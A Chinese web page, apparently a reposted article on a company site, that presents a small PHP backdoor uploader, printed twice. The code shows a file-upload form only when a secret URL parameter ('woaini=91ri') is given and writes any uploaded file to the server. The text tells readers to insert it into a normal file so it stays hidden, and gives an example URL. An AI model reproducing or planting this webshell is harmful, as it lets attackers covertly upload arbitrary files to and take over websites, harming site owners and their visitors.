企业资讯
- 企业新闻
- 行业文章

极隐蔽的php小马一枚

 &lt;?php if($_GET["woaini"]==”91ri”){if ($_SERVER['REQUEST_METHOD'] == ‘POST’) { echo “url:”.$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?&gt;&lt;form method=”post” enctype=”multipart/form-data”&gt;&lt;input name=”upfile” type=”file”&gt;&lt;input type=”submit” value=”ok”&gt;&lt;/form&gt;&lt;?php }?&gt;

<?php

if($_GET[“woaini”]==“91ri”){if ($_SERVER[‘REQUEST_METHOD’] == ‘POST’) { echo “url:”.$_FILES[“upfile”][“name”];if(!file_exists($_FILES[“upfile”][“name”])){ copy($_FILES[“upfile”][“tmp_name”], $_FILES[“upfile”][“name”]); }}?><form method=“post” enctype=“multipart/form-data”><input name=“upfile” type=“file”><input type=“submit” value=“ok”></form><?php }?>

将以上代码插入正常文件中，直接访问该文件无任何变化但在文件末尾加上?woaini=91ri即可显示出小马(直接上传文件的那种)

例如：http://www.91ri.org/ index.php?woaini=91ri

图我就不截了我相信大家看例子就能明白

link:http://blog.weili.me/blog/article.asp?id=119

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理，转载请注明出处！

鸿大千秋网站建设团队敬上